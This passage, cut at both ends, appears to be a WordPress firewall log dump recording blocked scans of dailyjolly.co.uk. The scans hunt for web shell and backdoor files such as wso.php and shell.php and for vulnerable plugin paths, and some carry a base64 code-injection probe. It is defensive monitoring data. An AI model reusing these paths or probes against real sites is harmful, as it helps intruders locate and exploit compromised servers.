Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','iRUwuGk5HPnOcLXdxpylgfo4',0,1674983108.5931,192,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/churchlife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','ZmL6DMkSw2BxWulEXITKHeJc',0,1674983131.5954,183,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/theme-deejay/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','fOsVAvozYndwhtTeFaxc6H0I',0,1674983142.5872,179,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/soccer-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Bbl7g5pzSVXEHR2FQhyeIdDv',0,1674983182.8056,189,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/bolster-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','p7BKUiXVxbuGfDjnJq5aZyPm',0,1674983193.9761,201,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/club-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','slwihEu2DgXUjaVAm65GNLc4',0,1674983199.7492,201,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/snapture/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','q1bjr8wDKgufV6PzHQs9OMx7',0,1674983210.8250,220,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','mUV19Y0O7RJuX5NbDSgfzQPp',0,1675003698.4591,187,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/wp-setups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','DbhGOtnKgoXcveAEPiVrB79Y',0,1675003698.7109,178,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Yv1lHxyo6rCU9b0dzAXQ8Nua',0,1675003698.9528,182,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qCwGy5om0YikuWRseDnNF47O',0,1675003699.1933,186,'','POST',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','pVGcqj25B1QK7mdXHM9ONTUZ',0,1675003699.4459,169,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','KLklwM7YzGp53cyCeE6BhUZN',0,1675003699.7006,188,'','POST',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/wp-story.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','bhFzD7dQ86VixcvUCelky3wr',0,1675003699.9479,158,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/wp-story.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','y8uNl9wA12f5WXPaIKcUgLOV',0,1675003700.1562,178,'','POST',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/simple.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','wQCG1MUu4Aldcsho3Tq6LNHY',0,1675003700.3970,180,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','w4nuMOYlSQtx8fhb3KgDNUqC',0,1675003701.1068,167,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','9xQWGchuzyKVOwEJ0AN7raZL',0,1675003701.3286,215,'','GET',403,0,700,0,1,'',0),('193.42.33.150',3240763798,'','https://dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','ELZuvCz5VIJBsobQkPFaeYmh',0,1675025660.6855,224,'','GET',403,0,700,0,1,'',0),('193.42.33.150',3240763798,'','https://dailyjolly.co.uk/wp/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','SB5jCHRNTOJqAMPduzsy36pK',0,1675025749.9034,203,'','GET',403,0,700,0,1,'',0),('193.42.33.150',3240763798,'','https://dailyjolly.co.uk/wordpress/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','2u9DdSt5rI3pqmPLxFgVkMfb',0,1675025807.5408,204,'','GET',403,0,700,0,1,'',0),('193.42.33.150',3240763798,'','https://dailyjolly.co.uk/blog/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','0mQfkz8FaTNdcu6rPnbHSlIO',0,1675025899.5871,216,'','GET',403,0,700,0,1,'',0),('193.42.33.150',3240763798,'','https://dailyjolly.co.uk/wp-content/plugins/core-engine/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','cB3yIGStEx8izLVs4eHPuRdp',0,1675025992.6994,209,'','GET',403,0,700,0,1,'',0),('193.42.33.150',3240763798,'','https://dailyjolly.co.uk/wp-content/plugins/wpyii2/wpyii2.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','JPsDG1XhFiNzaeUp5BZyK2mq',0,1675026111.1496,202,'','GET',403,0,700,0,1,'',0),('193.42.33.150',3240763798,'','https://dailyjolly.co.uk/wp-content/plugins/wpzip/wpzip.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','0msYUkyTagXwNDdWhBCue7J1',0,1675026158.2749,597,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-admin/css/colors/colors.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','5ta1XLjqdYTmIRnGfblFwhZy',0,1675045817.2547,228,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-includes/user-handler.php','','{\"1\":\"Linux Mozilla\"}','ofJ0PD4eZYNHvVXWQltcuyS7',0,1675045817.6657,223,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-includes/wp-includes.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','3qztwIaEdYefmjxMgDs4LNy9',0,1675045818.2410,329,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-instance.php','','{\"1\":\"Linux Mozilla\"}','1RyC7i8XnMs9xeDPTZdBq3Jr',0,1675045818.4495,278,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-content/wp-content.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','6AGoTlnQwz0kvPmutMfCHWVD',0,1675045819.1566,217,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-content/plugins/ultra-cache/index.php','','{\"1\":\"Linux Mozilla\"}','8MBPV5cJTxDFQ17SZpjnhWar',0,1675045819.2481,243,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-content/plugins/all-in-one-wp-migration/lib/model/export/module.php','','{\"1\":\"Linux Mozilla\"}','TJNPOxqkLhbwVyEUlZHtGWIR',0,1675045820.0205,196,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-admin/wp-admin.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','Im5rlKg0UPFaobQnLjfA3WGT',0,1675045820.0945,185,'','GET',403,0,700,0,1,'',0),('185.150.191.81',3113664337,'','https://www.dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Dkw3H4bd6N5xIhcaBGpWsq8X',0,1675047307.9618,4063,'','POST',403,0,700,0,1,'',0),('185.150.191.81',3113664337,'','https://www.dailyjolly.co.uk/vlcunlph.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','dBWga1yTn4068EvOM5JuQIrk',0,1675047312.5238,1367,'','GET',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LGzcfuF6ITBMx1WgnrmDSbdK',0,1675053663.1545,248,'','GET',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/wp-setups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','8E7PVcAtXLCxbiO3DZrn61vd',0,1675053663.5407,203,'','GET',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Mu6NfJyYjqHRsVzBp3eK2Sl5',0,1675053663.8147,168,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','aPFdU2yWVeBRub3sjfn0Dl8o',0,1675053663.9003,165,'','GET',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','h9BJalecSTMXQ36t0RFdIYOn',0,1675053664.0522,299,'','POST',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','sPX5OevNiabthnTDgy8LfmjM',0,1675053664.7384,291,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/wp-setups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ySn9daQX2bAtFP7pzE3KHO45',0,1675053664.5275,537,'','GET',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qrZyG6Mu3b8W7vA2smfhKDdL',0,1675053665.2340,360,'','POST',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/wp-story.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','A4N0VI1FX37i6DHBoqUTcbPl',0,1675053665.6832,173,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','SgRjMQh9HZqOzcwCAprJau08',0,1675053666.0377,170,'','GET',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/wp-story.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','rQliTxtnDUCLmhyqzO65dPIe',0,1675053666.0884,169,'','POST',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/simple.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FpAoBhtNdS9eVkKcXunjrxs1',0,1675053666.4411,203,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Qb9K2rU1u0SfJZaTjwWNG5nR',0,1675053666.8282,183,'','POST',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','5ZGEUeOHoij7Mayt1Q06Bbc4',0,1675053667.3128,165,'','GET',403,0,700,0,1,'',0),('89.39.107.6',1495755526,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','sgBDKOxvcGeuYIJ9qylTCF7d',0,1675053667.5527,165,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','JR7QEpN3UV9Zo2ri51hmHtWP',0,1675053667.6273,168,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','cdGjeXmBZ5lCAKJMnupo8vLt',0,1675053668.2802,180,'','POST',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/wp-story.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','HRdUmhtTufnIYL06xeZsSFJ3',0,1675053668.9292,168,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/wp-story.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Pusz9rDg6im0eVMZyYQb4LWS',0,1675053669.7109,179,'','POST',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/simple.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','yqvaAZdXosYP6c94J3ThjlFb',0,1675053670.3586,176,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','QGbyku83LYjOfxwZnz2UJrvq',0,1675053671.8581,221,'','GET',403,0,700,0,1,'',0),('162.244.33.54',2733908278,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','46KSwIk18diHnfMYvEtzhuDr',0,1675053672.5325,168,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','dMc8bxPfys0vaorHqOu65e7g',0,1675088307.7554,249,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','WV2zjHxycUKA4E6NI7dkvbCL',0,1675088309.0568,231,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','FmQjlX0zSJ5wY4datC2GPkM8',0,1675088310.2784,199,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','JvQqyw64K0bSzhRxcEAY1fVr',0,1675088311.4370,186,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','BVt4fzuC2Oeig63wGTAhZr9P',0,1675088312.8267,198,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.27.1\"}','PKXWb3uwTfL4dR5qckCO0n9S',0,1675088314.0675,176,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','Y58qv3SFhzkfpnDNPgGoQAte',0,1675088316.7431,175,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','N2g6cjZARhMUHEy9sGx0CqYX',0,1675088317.8316,224,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','vQirsMfbh5uTaIqp2toBZx1l',0,1675088318.6863,165,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','2MOclmfWNCdKqtakzQIyXY87',0,1675088327.7553,193,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','R1Gr2Oi73MjUN5n6oZzAYw0L',0,1675088328.7064,166,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','qjZNHtuP9beRVO3lahCUzcQm',0,1675088330.0109,184,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','4oB8FVWyN7RGub6ZafmDPST9',0,1675088330.8874,182,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','wKkZqS2YfrDGBLXWpPA4QHi8',0,1675088331.5884,178,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','eoVi2MzWOkySQ1Gwgmxu7J8Z',0,1675088332.1406,170,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','yDkzm13gaL4RMQYAeBZsvdXi',0,1675088332.9106,197,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','6s4wFYBceCq7WndKgTPOahmE',0,1675088333.4575,183,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','emcCZTwX6xSQMLsA3UrRNol4',0,1675088334.0379,170,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','kKp7IdPoaiC4lARg23eYFzwx',0,1675088335.0224,198,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','l7t6IJROQYK5BwCGdv3oH0TM',0,1675088335.7724,206,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','FqZN2kwiPJGU6VnTbQu0WceA',0,1675088336.4319,416,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','jN0oqpksFOAmESibt83nIdTY',0,1675088337.2643,257,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','l2sU3wI6LQyVBFfcWNDu7e1j',0,1675088346.7303,198,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','CuyE1ORqmZwhDpLXPQgv3JWV',0,1675088347.6913,205,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.27.1\"}','Jv81SHnTMIjr4AFeotPD5CUx',0,1675088348.7956,171,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.27.1\"}','unlEwUTMfjhb7Hr2O54XIB9L',0,1675088350.2839,170,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','GOnzbuYL9U3TgNmZSHjlJ2qI',0,1675088352.0587,171,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','KwxOmyI9CVaZJARN5QhoTk6H',0,1675088353.4344,170,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','lUPGRu06LyrYajJIKE4QBh3v',0,1675088354.6423,180,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','3GBV659ysR4OTgEoW7dKjShN',0,1675088355.8517,202,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','QsyoKTnZd086Ap3J7ImqXYkD',0,1675088356.7906,169,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"python-requests\\/2.27.1\"}','YsUMhzfrP91xDFZNeILkBnyK',0,1675088358.0676,205,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/Marvins.php','','{\"1\":\"python-requests\\/2.27.1\"}','k35jrNwUO8q7VZMlzB4bG6IJ',0,1675088358.8416,185,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/rxr.php?rxr','','{\"1\":\"python-requests\\/2.27.1\"}','x2ewuXFT6icvk4nNUQl7PL5q',0,1675088361.6118,159,'','GET',403,0,700,0,1,'',0),('51.77.78.41',8607042